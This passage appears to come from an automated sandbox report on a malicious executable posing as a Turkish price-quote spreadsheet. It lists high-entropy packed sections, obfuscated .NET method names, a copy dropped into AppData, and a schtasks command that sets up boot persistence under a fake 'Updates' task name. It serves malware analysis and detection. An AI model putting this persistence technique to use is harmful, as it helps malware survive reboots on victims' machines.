                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B77A9 pushad ; retf 10_2_071B77B5
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012B9C30 push esp; retf 0150h14_2_012B9D55
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: section name: .text entropy: 7.986844435005259
                    Source: YzkHZRBcm.exe.0.drStatic PE information: section name: .text entropy: 7.986844435005259
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, fb6yvpsy14g5qhnfk0.csHigh entropy of concatenated method names: 'p4hGfKv758', 'CSCG6OxAhe', 'ToString', 'NiEGd2m8Vr', 'ydAG2e4I7P', 'VQbGPg5Jcw', 'O74GTnf35m', 'iw1GhaxxaK', 'l7bG7BXmHP', 'LYPGRrujTx'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, rtPNF2YwxlfdEVDxrl.csHigh entropy of concatenated method names: 'GAN7dExPKi', 'b307PMPUe1', 'k637hhNEMx', 'RwwhBW4Syn', 'KtmhzQSyVO', 'OBH74sqFhx', 'etn7XDI063', 'PgB7LGlfE1', 'TqX7jA5oby', 'TUQ7I4CfOi'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, W5VmDo6HmpAgbNZEiu.csHigh entropy of concatenated method names: 'SUUPeJkw3p', 'CKHPvmlX49', 'riCPgHNqd6', 'PpKP9pyFXx', 'CxkPpyhMR7', 'sBKPlFMr86', 'TUtPGycVFG', 'nv6PtOU4vp', 'YLUP5E0whf', 'yXEPZfDNTF'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.csHigh entropy of concatenated method names: 'JuyjqubICF', 'adGjdiT4VG', 'G1Lj2rg7J9', 'lFdjPqgoqu', 'APKjT2sUI9', 'a8AjhjZblb', 'gfIj73SfM2', 'VJMjRZG6is', 'DI3jwg3pOC', 'eqcjfcB2V2'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, mJTKhIVc7qJwtjTabI.csHigh entropy of concatenated method names: 'cTZ7J7cYNC', 'aDc7bubEX6', 'Gch7rof9kI', 'lXE7eJhLQ3', 'ImL7nb3ykE', 'r227vpCqua', 'X157D4IK4V', 'MCF7gwnQHe', 'XI679DETYL', 'fKZ7cqDSWp'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, FcY9ehqsfh4aVO4DAb.csHigh entropy of concatenated method names: 'D2q28UTrCE', 'Y2B2O1qNAl', 'UsS2aZpC1K', 'vLW2mjcXTs', 'CcM2QesN39', 'Hyi21AZKxl', 'CYk2Erijq4', 'vHf2SZEyva', 'q7F20ALLfy', 'uiZ2BWXMey'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, NfalMhJ8uA3kaHXvgn.csHigh entropy of concatenated method names: 'ToString', 'tdglMUaySS', 'BMclAsdFte', 'hYZlsxPYEP', 'MK1lkJ0diI', 'dCElo5YxH6', 'JQvl3uxecR', 'PrjlK7yYaC', 'k5TliNlb7R', 'QNRlyNnBHo'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, IjoMYfSa29sGRgq0j8.csHigh entropy of concatenated method names: 'vQWr8baQZ', 'Ccae7WApT', 'aVDv3Qkmf', 'aKGDdS7qC', 'Gbm9dAnY8', 'UHGciHeww', 'rtrMBYy51Dp9VwCUMs', 'Cv2kP3WWM0GKyRy3ht', 'z1Lt2Rrlf', 'NgAZ1LGLD'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, x64ZxoKhudRg3sF6Kl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wOtL0N3Xg9', 'hH5LBRHur0', 'rd1LzlS6QM', 'iobj4TwJRY', 'DrrjXiHUKv', 'bHmjLl2JHQ', 'yMEjjykn2a', 'wQ5Z4AFKj0x1Du6XXWu'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, lq3FlorROTtpd8nMyY.csHigh entropy of concatenated method names: 'q9ZGSivXxZ', 'CK3GBVQrlu', 'mM5t4fJl6W', 'SsatXaa4E4', 'RLOGMNoVjD', 'NmyGUDJQmN', 'wppGYupSnp', 'lKOG8FVJIn', 'WYBGOsIjVA', 'nb8GaMKfFy'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, j7LYTtwUmq2kSe3mU3.csHigh entropy of concatenated method names: 'YbGtWNOd1L', 'FLKtAXxfNV', 'NvktsgnmsX', 'zPrtkVv3rI', 'PULt85cSZV', 'C6AtorPdhg', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, ns7of4m4T22kQcU5Nm.csHigh entropy of concatenated method names: 'h0vTnik92O', 'CobTDtYk7S', 'T3YPsN1Bxi', 'oF1Pk8jW5X', 'Tw7Poq0ahL', 'SfwP3Np9tC', 'qZ0PKsuXGC', 'BKPPiCe7sB', 'V8hPytjm7x', 'OcjPFSVP1s'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, jO0gAth6LXQ4IqyJvc.csHigh entropy of concatenated method names: 'ztttdiG5AS', 'LpBt2Yvjvf', 'VKWtPm63Y6', 'khTtT9NcrD', 'TOAthuxFga', 'dUwt7S8BQe', 'dvKtR1d9M2', 'd8PtwQUkxy', 'EVZtfKRsy1', 'U7Lt6TFfu7'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, vqNN8YFCFfqQL6aBZ5H.csHigh entropy of concatenated method names: 'fav5JYFKUS', 'ono5bGF0xe', 'VH35rojooI', 'wss5eusTYN', 'bya5nAEG2Q', 'oLj5vGitbF', 'U5m5DdO3x0', 'SY85gBt50M', 'R3l591KDxO', 'GkI5cwHJe7'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, zCNwJdFnQu4puUFchct.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgbZ8cEKSB', 'zQ7ZO1706m', 'FY3Za5nCXY', 'IE3ZmF4FH5', 'kAiZQysu7M', 'YNIZ1BLPUI', 'wOGZEHPB8g'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, n6TEH8zCDlVl4HvvYO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ih45NxkWDW', 'FP85psnaKW', 'AFc5lXeqND', 'elM5GeU4di', 'fPs5ttS2Ho', 'qqA55H9qyC', 'u9r5ZCPuaQ'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, rC3oiK5rTtspMSI9J1.csHigh entropy of concatenated method names: 'GbmhqLAXWQ', 'w4wh2ynJYM', 'hJFhT6AaXb', 'Rg1h7G0OA5', 'uHchRdmBID', 'I38TQIqQkZ', 'nBgT1pdIWE', 'SUNTEukURZ', 'lTETS1axwi', 'a27T00VZeI'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, kG4rDQDRSR9x8fka51.csHigh entropy of concatenated method names: 'Dispose', 'yWdX0a3wNK', 'AQ4LArR3fh', 'K1XxxJ42gs', 'wZ6XBNWLdj', 'OZcXzQ9FkL', 'ProcessDialogKey', 'xf6L4XVVO1', 'IF6LXbwoBN', 'fOWLLYVOFa'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, zOP9a9BGA3on5uXvvo.csHigh entropy of concatenated method names: 'mZkNgowxlj', 'UlFN9ov2pV', 'JXuNWWn3fw', 'fZvNAi3n7c', 'E4ZNkSpyP8', 'UTkNonhXMH', 'YqJNKgtGv4', 's1uNiPwjJv', 'K5gNFqPYE4', 'IkBNMrxgyM'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, oGQm8v3wF9JwNXXwVH.csHigh entropy of concatenated method names: 'SrZ5XE6Tc5', 'wTX5jTDwuF', 'jap5ILpo1Y', 'g7K5dho5Oh', 'XPE52Kenno', 'ugi5TBgvZ4', 'O7V5hYOpJb', 'T9ftEp89NG', 'GPmtSWNIel', 'u4bt0TceYG'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, nUhYvTMom9nagO8Sow.csHigh entropy of concatenated method names: 'o3MX74Mq04', 'uObXReINPD', 'dXTXfBGNYn', 'xPMX6BS3ud', 'u9mXp77NRW', 'KKxXlgLjdq', 'j84tDXVZHiSXNklwPH', 'cBkG1pzyl2MZiLtvHX', 'W0PXXS3Axk', 'UINXj94KpN'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, fb6yvpsy14g5qhnfk0.csHigh entropy of concatenated method names: 'p4hGfKv758', 'CSCG6OxAhe', 'ToString', 'NiEGd2m8Vr', 'ydAG2e4I7P', 'VQbGPg5Jcw', 'O74GTnf35m', 'iw1GhaxxaK', 'l7bG7BXmHP', 'LYPGRrujTx'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, rtPNF2YwxlfdEVDxrl.csHigh entropy of concatenated method names: 'GAN7dExPKi', 'b307PMPUe1', 'k637hhNEMx', 'RwwhBW4Syn', 'KtmhzQSyVO', 'OBH74sqFhx', 'etn7XDI063', 'PgB7LGlfE1', 'TqX7jA5oby', 'TUQ7I4CfOi'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, W5VmDo6HmpAgbNZEiu.csHigh entropy of concatenated method names: 'SUUPeJkw3p', 'CKHPvmlX49', 'riCPgHNqd6', 'PpKP9pyFXx', 'CxkPpyhMR7', 'sBKPlFMr86', 'TUtPGycVFG', 'nv6PtOU4vp', 'YLUP5E0whf', 'yXEPZfDNTF'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.csHigh entropy of concatenated method names: 'JuyjqubICF', 'adGjdiT4VG', 'G1Lj2rg7J9', 'lFdjPqgoqu', 'APKjT2sUI9', 'a8AjhjZblb', 'gfIj73SfM2', 'VJMjRZG6is', 'DI3jwg3pOC', 'eqcjfcB2V2'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, mJTKhIVc7qJwtjTabI.csHigh entropy of concatenated method names: 'cTZ7J7cYNC', 'aDc7bubEX6', 'Gch7rof9kI', 'lXE7eJhLQ3', 'ImL7nb3ykE', 'r227vpCqua', 'X157D4IK4V', 'MCF7gwnQHe', 'XI679DETYL', 'fKZ7cqDSWp'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, FcY9ehqsfh4aVO4DAb.csHigh entropy of concatenated method names: 'D2q28UTrCE', 'Y2B2O1qNAl', 'UsS2aZpC1K', 'vLW2mjcXTs', 'CcM2QesN39', 'Hyi21AZKxl', 'CYk2Erijq4', 'vHf2SZEyva', 'q7F20ALLfy', 'uiZ2BWXMey'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, NfalMhJ8uA3kaHXvgn.csHigh entropy of concatenated method names: 'ToString', 'tdglMUaySS', 'BMclAsdFte', 'hYZlsxPYEP', 'MK1lkJ0diI', 'dCElo5YxH6', 'JQvl3uxecR', 'PrjlK7yYaC', 'k5TliNlb7R', 'QNRlyNnBHo'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, IjoMYfSa29sGRgq0j8.csHigh entropy of concatenated method names: 'vQWr8baQZ', 'Ccae7WApT', 'aVDv3Qkmf', 'aKGDdS7qC', 'Gbm9dAnY8', 'UHGciHeww', 'rtrMBYy51Dp9VwCUMs', 'Cv2kP3WWM0GKyRy3ht', 'z1Lt2Rrlf', 'NgAZ1LGLD'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, x64ZxoKhudRg3sF6Kl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wOtL0N3Xg9', 'hH5LBRHur0', 'rd1LzlS6QM', 'iobj4TwJRY', 'DrrjXiHUKv', 'bHmjLl2JHQ', 'yMEjjykn2a', 'wQ5Z4AFKj0x1Du6XXWu'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, lq3FlorROTtpd8nMyY.csHigh entropy of concatenated method names: 'q9ZGSivXxZ', 'CK3GBVQrlu', 'mM5t4fJl6W', 'SsatXaa4E4', 'RLOGMNoVjD', 'NmyGUDJQmN', 'wppGYupSnp', 'lKOG8FVJIn', 'WYBGOsIjVA', 'nb8GaMKfFy'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, j7LYTtwUmq2kSe3mU3.csHigh entropy of concatenated method names: 'YbGtWNOd1L', 'FLKtAXxfNV', 'NvktsgnmsX', 'zPrtkVv3rI', 'PULt85cSZV', 'C6AtorPdhg', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, ns7of4m4T22kQcU5Nm.csHigh entropy of concatenated method names: 'h0vTnik92O', 'CobTDtYk7S', 'T3YPsN1Bxi', 'oF1Pk8jW5X', 'Tw7Poq0ahL', 'SfwP3Np9tC', 'qZ0PKsuXGC', 'BKPPiCe7sB', 'V8hPytjm7x', 'OcjPFSVP1s'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, jO0gAth6LXQ4IqyJvc.csHigh entropy of concatenated method names: 'ztttdiG5AS', 'LpBt2Yvjvf', 'VKWtPm63Y6', 'khTtT9NcrD', 'TOAthuxFga', 'dUwt7S8BQe', 'dvKtR1d9M2', 'd8PtwQUkxy', 'EVZtfKRsy1', 'U7Lt6TFfu7'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, vqNN8YFCFfqQL6aBZ5H.csHigh entropy of concatenated method names: 'fav5JYFKUS', 'ono5bGF0xe', 'VH35rojooI', 'wss5eusTYN', 'bya5nAEG2Q', 'oLj5vGitbF', 'U5m5DdO3x0', 'SY85gBt50M', 'R3l591KDxO', 'GkI5cwHJe7'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, zCNwJdFnQu4puUFchct.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgbZ8cEKSB', 'zQ7ZO1706m', 'FY3Za5nCXY', 'IE3ZmF4FH5', 'kAiZQysu7M', 'YNIZ1BLPUI', 'wOGZEHPB8g'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, n6TEH8zCDlVl4HvvYO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ih45NxkWDW', 'FP85psnaKW', 'AFc5lXeqND', 'elM5GeU4di', 'fPs5ttS2Ho', 'qqA55H9qyC', 'u9r5ZCPuaQ'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, rC3oiK5rTtspMSI9J1.csHigh entropy of concatenated method names: 'GbmhqLAXWQ', 'w4wh2ynJYM', 'hJFhT6AaXb', 'Rg1h7G0OA5', 'uHchRdmBID', 'I38TQIqQkZ', 'nBgT1pdIWE', 'SUNTEukURZ', 'lTETS1axwi', 'a27T00VZeI'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, kG4rDQDRSR9x8fka51.csHigh entropy of concatenated method names: 'Dispose', 'yWdX0a3wNK', 'AQ4LArR3fh', 'K1XxxJ42gs', 'wZ6XBNWLdj', 'OZcXzQ9FkL', 'ProcessDialogKey', 'xf6L4XVVO1', 'IF6LXbwoBN', 'fOWLLYVOFa'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, zOP9a9BGA3on5uXvvo.csHigh entropy of concatenated method names: 'mZkNgowxlj', 'UlFN9ov2pV', 'JXuNWWn3fw', 'fZvNAi3n7c', 'E4ZNkSpyP8', 'UTkNonhXMH', 'YqJNKgtGv4', 's1uNiPwjJv', 'K5gNFqPYE4', 'IkBNMrxgyM'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, oGQm8v3wF9JwNXXwVH.csHigh entropy of concatenated method names: 'SrZ5XE6Tc5', 'wTX5jTDwuF', 'jap5ILpo1Y', 'g7K5dho5Oh', 'XPE52Kenno', 'ugi5TBgvZ4', 'O7V5hYOpJb', 'T9ftEp89NG', 'GPmtSWNIel', 'u4bt0TceYG'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, nUhYvTMom9nagO8Sow.csHigh entropy of concatenated method names: 'o3MX74Mq04', 'uObXReINPD', 'dXTXfBGNYn', 'xPMX6BS3ud', 'u9mXp77NRW', 'KKxXlgLjdq', 'j84tDXVZHiSXNklwPH', 'cBkG1pzyl2MZiLtvHX', 'W0PXXS3Axk', 'UINXj94KpN'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, fb6yvpsy14g5qhnfk0.csHigh entropy of concatenated method names: 'p4hGfKv758', 'CSCG6OxAhe', 'ToString', 'NiEGd2m8Vr', 'ydAG2e4I7P', 'VQbGPg5Jcw', 'O74GTnf35m', 'iw1GhaxxaK', 'l7bG7BXmHP', 'LYPGRrujTx'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, rtPNF2YwxlfdEVDxrl.csHigh entropy of concatenated method names: 'GAN7dExPKi', 'b307PMPUe1', 'k637hhNEMx', 'RwwhBW4Syn', 'KtmhzQSyVO', 'OBH74sqFhx', 'etn7XDI063', 'PgB7LGlfE1', 'TqX7jA5oby', 'TUQ7I4CfOi'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, W5VmDo6HmpAgbNZEiu.csHigh entropy of concatenated method names: 'SUUPeJkw3p', 'CKHPvmlX49', 'riCPgHNqd6', 'PpKP9pyFXx', 'CxkPpyhMR7', 'sBKPlFMr86', 'TUtPGycVFG', 'nv6PtOU4vp', 'YLUP5E0whf', 'yXEPZfDNTF'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.csHigh entropy of concatenated method names: 'JuyjqubICF', 'adGjdiT4VG', 'G1Lj2rg7J9', 'lFdjPqgoqu', 'APKjT2sUI9', 'a8AjhjZblb', 'gfIj73SfM2', 'VJMjRZG6is', 'DI3jwg3pOC', 'eqcjfcB2V2'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, mJTKhIVc7qJwtjTabI.csHigh entropy of concatenated method names: 'cTZ7J7cYNC', 'aDc7bubEX6', 'Gch7rof9kI', 'lXE7eJhLQ3', 'ImL7nb3ykE', 'r227vpCqua', 'X157D4IK4V', 'MCF7gwnQHe', 'XI679DETYL', 'fKZ7cqDSWp'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, FcY9ehqsfh4aVO4DAb.csHigh entropy of concatenated method names: 'D2q28UTrCE', 'Y2B2O1qNAl', 'UsS2aZpC1K', 'vLW2mjcXTs', 'CcM2QesN39', 'Hyi21AZKxl', 'CYk2Erijq4', 'vHf2SZEyva', 'q7F20ALLfy', 'uiZ2BWXMey'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, NfalMhJ8uA3kaHXvgn.csHigh entropy of concatenated method names: 'ToString', 'tdglMUaySS', 'BMclAsdFte', 'hYZlsxPYEP', 'MK1lkJ0diI', 'dCElo5YxH6', 'JQvl3uxecR', 'PrjlK7yYaC', 'k5TliNlb7R', 'QNRlyNnBHo'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, IjoMYfSa29sGRgq0j8.csHigh entropy of concatenated method names: 'vQWr8baQZ', 'Ccae7WApT', 'aVDv3Qkmf', 'aKGDdS7qC', 'Gbm9dAnY8', 'UHGciHeww', 'rtrMBYy51Dp9VwCUMs', 'Cv2kP3WWM0GKyRy3ht', 'z1Lt2Rrlf', 'NgAZ1LGLD'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, x64ZxoKhudRg3sF6Kl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wOtL0N3Xg9', 'hH5LBRHur0', 'rd1LzlS6QM', 'iobj4TwJRY', 'DrrjXiHUKv', 'bHmjLl2JHQ', 'yMEjjykn2a', 'wQ5Z4AFKj0x1Du6XXWu'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, lq3FlorROTtpd8nMyY.csHigh entropy of concatenated method names: 'q9ZGSivXxZ', 'CK3GBVQrlu', 'mM5t4fJl6W', 'SsatXaa4E4', 'RLOGMNoVjD', 'NmyGUDJQmN', 'wppGYupSnp', 'lKOG8FVJIn', 'WYBGOsIjVA', 'nb8GaMKfFy'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, j7LYTtwUmq2kSe3mU3.csHigh entropy of concatenated method names: 'YbGtWNOd1L', 'FLKtAXxfNV', 'NvktsgnmsX', 'zPrtkVv3rI', 'PULt85cSZV', 'C6AtorPdhg', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, ns7of4m4T22kQcU5Nm.csHigh entropy of concatenated method names: 'h0vTnik92O', 'CobTDtYk7S', 'T3YPsN1Bxi', 'oF1Pk8jW5X', 'Tw7Poq0ahL', 'SfwP3Np9tC', 'qZ0PKsuXGC', 'BKPPiCe7sB', 'V8hPytjm7x', 'OcjPFSVP1s'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, jO0gAth6LXQ4IqyJvc.csHigh entropy of concatenated method names: 'ztttdiG5AS', 'LpBt2Yvjvf', 'VKWtPm63Y6', 'khTtT9NcrD', 'TOAthuxFga', 'dUwt7S8BQe', 'dvKtR1d9M2', 'd8PtwQUkxy', 'EVZtfKRsy1', 'U7Lt6TFfu7'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, vqNN8YFCFfqQL6aBZ5H.csHigh entropy of concatenated method names: 'fav5JYFKUS', 'ono5bGF0xe', 'VH35rojooI', 'wss5eusTYN', 'bya5nAEG2Q', 'oLj5vGitbF', 'U5m5DdO3x0', 'SY85gBt50M', 'R3l591KDxO', 'GkI5cwHJe7'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, zCNwJdFnQu4puUFchct.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgbZ8cEKSB', 'zQ7ZO1706m', 'FY3Za5nCXY', 'IE3ZmF4FH5', 'kAiZQysu7M', 'YNIZ1BLPUI', 'wOGZEHPB8g'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, n6TEH8zCDlVl4HvvYO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ih45NxkWDW', 'FP85psnaKW', 'AFc5lXeqND', 'elM5GeU4di', 'fPs5ttS2Ho', 'qqA55H9qyC', 'u9r5ZCPuaQ'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, rC3oiK5rTtspMSI9J1.csHigh entropy of concatenated method names: 'GbmhqLAXWQ', 'w4wh2ynJYM', 'hJFhT6AaXb', 'Rg1h7G0OA5', 'uHchRdmBID', 'I38TQIqQkZ', 'nBgT1pdIWE', 'SUNTEukURZ', 'lTETS1axwi', 'a27T00VZeI'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, kG4rDQDRSR9x8fka51.csHigh entropy of concatenated method names: 'Dispose', 'yWdX0a3wNK', 'AQ4LArR3fh', 'K1XxxJ42gs', 'wZ6XBNWLdj', 'OZcXzQ9FkL', 'ProcessDialogKey', 'xf6L4XVVO1', 'IF6LXbwoBN', 'fOWLLYVOFa'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, zOP9a9BGA3on5uXvvo.csHigh entropy of concatenated method names: 'mZkNgowxlj', 'UlFN9ov2pV', 'JXuNWWn3fw', 'fZvNAi3n7c', 'E4ZNkSpyP8', 'UTkNonhXMH', 'YqJNKgtGv4', 's1uNiPwjJv', 'K5gNFqPYE4', 'IkBNMrxgyM'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, oGQm8v3wF9JwNXXwVH.csHigh entropy of concatenated method names: 'SrZ5XE6Tc5', 'wTX5jTDwuF', 'jap5ILpo1Y', 'g7K5dho5Oh', 'XPE52Kenno', 'ugi5TBgvZ4', 'O7V5hYOpJb', 'T9ftEp89NG', 'GPmtSWNIel', 'u4bt0TceYG'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, nUhYvTMom9nagO8Sow.csHigh entropy of concatenated method names: 'o3MX74Mq04', 'uObXReINPD', 'dXTXfBGNYn', 'xPMX6BS3ud', 'u9mXp77NRW', 'KKxXlgLjdq', 'j84tDXVZHiSXNklwPH', 'cBkG1pzyl2MZiLtvHX', 'W0PXXS3Axk', 'UINXj94KpN'
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
